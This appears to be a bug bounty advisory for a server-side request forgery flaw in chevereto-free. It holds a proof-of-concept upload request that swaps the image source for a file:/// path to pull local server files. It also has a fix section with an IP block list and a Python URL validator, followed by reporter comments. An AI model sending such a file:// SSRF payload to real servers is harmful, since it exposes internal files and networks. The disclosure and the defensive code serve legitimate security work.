Server-Side Request Forgery (SSRF) in chevereto/chevereto-free
Reported on
Oct 2nd 2021
Description
Attackers can make the server perform arbitrary requests to internal IPs as well as use the file:/// protocol to disclose internal image data.
Proof of Concept
1: Create a valid image file on the server at /path/to/index.png
2: Choose "add Image URLs", enter a valid URL and click OK. Then click Upload and intercept the request:
3: Now change the source parameter to file:///path/to/index.png:
/POST /Chevereto-Free-1.4.1/json HTTP/1.1
Host: 10.0.2.15
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------33931558783514564834640665316
Content-Length: 811
Origin: http://10.0.2.15
Connection: close
Referer: http://10.0.2.15/Chevereto-Free-1.4.1/upload
-----------------------------33931558783514564834640665316
Content-Disposition: form-data; name="source"
file:///path/to/index.png
-----------------------------33931558783514564834640665316
Content-Disposition: form-data; name="type"
url
-----------------------------33931558783514564834640665316
Content-Disposition: form-data; name="action"
upload
-----------------------------33931558783514564834640665316
Content-Disposition: form-data; name="timestamp"
163316178669
-----------------------------33931558783514564834640665316
Content-Disposition: form-data; name="auth_token"
31f259f774280b6687c97d04f80a9410c948594e
-----------------------------33931558783514564834640665316
Content-Disposition: form-data; name="nsfw"
0
-----------------------------33931558783514564834640665316--
4: The index.png from the server's local filesystem should be uploaded.
Impact
This vulnerability is capable of leaking internal image files from the server, performing internal port scans, and interacting with internal web servers.
Recommended Fix
Block the file:// protocol and the internal IP ranges:
127.0.0.0 - 127.255.255.255
10.0.0.0 - 10.255.255.255
172.16.0.0 - 172.31.255.255
192.168.0.0 - 192.168.255.255
169.254.169.254
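As an added example (not Chevereto's code and not part of the report), the following Python check implements the recommended fix for the "add image URL" path: it allowlists only http and https (so file:// is rejected without needing its own rule), resolves the host, and rejects every address that falls in the ranges listed above. It goes beyond the report's list by also covering the whole 169.254.0.0/16 link-local block, 0.0.0.0/8, 100.64.0.0/10, IPv6 loopback/link-local/unique-local space, and IPv4-mapped IPv6 literals such as [::ffff:10.0.2.15]. The function names, the injectable resolver, and the .test hostnames are assumptions made for the example.

```python
import ipaddress
import socket
from urllib.parse import urlparse

# Allowlist of fetch schemes: file://, ftp://, gopher:// and the rest are rejected
# by default instead of each needing its own blocklist entry.
ALLOWED_SCHEMES = frozenset({"http", "https"})

# The ranges from the report's Recommended Fix as CIDR blocks, plus (assumption,
# not from the report) IPv6 equivalents and two other commonly internal ranges.
BLOCKED_NETWORKS = tuple(ipaddress.ip_network(cidr) for cidr in (
    "127.0.0.0/8",      # 127.0.0.0 - 127.255.255.255
    "10.0.0.0/8",       # 10.0.0.0 - 10.255.255.255
    "172.16.0.0/12",    # 172.16.0.0 - 172.31.255.255
    "192.168.0.0/16",   # 192.168.0.0 - 192.168.255.255
    "169.254.0.0/16",   # link-local; contains the 169.254.169.254 metadata address
    "0.0.0.0/8",        # "this network"; reaches localhost on Linux
    "100.64.0.0/10",    # carrier-grade NAT space, often used inside clouds
    "::1/128",          # IPv6 loopback
    "fc00::/7",         # IPv6 unique local
    "fe80::/10",        # IPv6 link-local
))


class UnsafeUrlError(ValueError):
    """Raised when a user-supplied URL must not be fetched by the server."""


def _default_resolver(host):
    """Resolve a hostname to every A/AAAA address it has (hypothetical helper)."""
    infos = socket.getaddrinfo(host, None, proto=socket.IPPROTO_TCP)
    return sorted({info[4][0] for info in infos})


def is_blocked_address(ip):
    """True if connecting to this IP reaches loopback, link-local or internal space."""
    addr = ipaddress.ip_address(ip)
    # ::ffff:10.0.2.15 is 10.0.2.15 on the wire, so judge the embedded IPv4 address.
    mapped = getattr(addr, "ipv4_mapped", None)
    if mapped is not None:
        addr = mapped
    if (addr.is_loopback or addr.is_link_local or addr.is_multicast
            or addr.is_unspecified or addr.is_reserved):
        return True
    return any(addr in net for net in BLOCKED_NETWORKS)


def validate_fetch_url(url, resolver=_default_resolver):
    """Return the addresses the fetcher may connect to, or raise UnsafeUrlError.

    `resolver` is injectable so the check can be tested without live DNS.
    """
    parsed = urlparse(url)
    if parsed.scheme.lower() not in ALLOWED_SCHEMES:
        raise UnsafeUrlError(f"scheme {parsed.scheme!r} is not allowed")
    host = parsed.hostname  # lower-cased, IPv6 brackets already stripped
    if not host:
        raise UnsafeUrlError("URL has no host")
    if parsed.username is not None or parsed.password is not None:
        raise UnsafeUrlError("credentials in the URL are not allowed")
    try:
        addresses = [str(ipaddress.ip_address(host))]  # literal IP, no DNS needed
    except ValueError:
        try:
            addresses = list(resolver(host))
        except OSError as exc:  # socket.gaierror is an OSError
            raise UnsafeUrlError(f"cannot resolve {host!r}: {exc}") from exc
    if not addresses:
        raise UnsafeUrlError(f"{host!r} resolved to no addresses")
    # Every record must pass: a name with one public and one internal record would
    # otherwise let the HTTP client pick the internal one.
    for ip in addresses:
        if is_blocked_address(ip):
            raise UnsafeUrlError(f"{host!r} resolves to blocked address {ip}")
    return addresses


def is_safe_fetch_url(url, resolver=_default_resolver):
    """Boolean convenience wrapper around validate_fetch_url."""
    try:
        validate_fetch_url(url, resolver)
    except UnsafeUrlError:
        return False
    return True


# Constructed DNS answers so the demo runs offline (.test is reserved for this use).
FAKE_DNS = {
    "img.example.test": ["203.0.113.10"],
    "split.example.test": ["203.0.113.10", "10.0.2.15"],
}


def fake_resolver(host):
    """Stand-in for DNS that answers only from FAKE_DNS."""
    try:
        return FAKE_DNS[host]
    except KeyError:
        raise socket.gaierror(f"no fake record for {host}")


if __name__ == "__main__":
    for candidate in ("https://img.example.test/a.png", "file:///path/to/index.png",
                      "http://127.0.0.1/", "http://169.254.169.254/",
                      "http://[::ffff:10.0.2.15]/", "http://split.example.test/a.png"):
        print(f"{candidate:40} safe={is_safe_fetch_url(candidate, fake_resolver)}")
```

Call validate_fetch_url before the fetch and connect to one of the addresses it returned (for example via cURL's CURLOPT_RESOLVE or the equivalent in your HTTP client) rather than letting the client do a second lookup, since a second answer may differ from the one that was checked (DNS rebinding). Apply the same check to every redirect target, because an allowed public host can redirect to an internal one.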
Hi there, thanks for validating the report. Instead of only blocking the file:// protocol, you should whitelist http:// and https://.
@maintainer @admin
Why was my report with the same vulnerability not approved?
@maintainer Instead of asking me for more information, she just insulted me….
https://huntr.dev/bounties/6b170fbc-49f6-44bb-bcb9-498057f71090/
Very interesting ....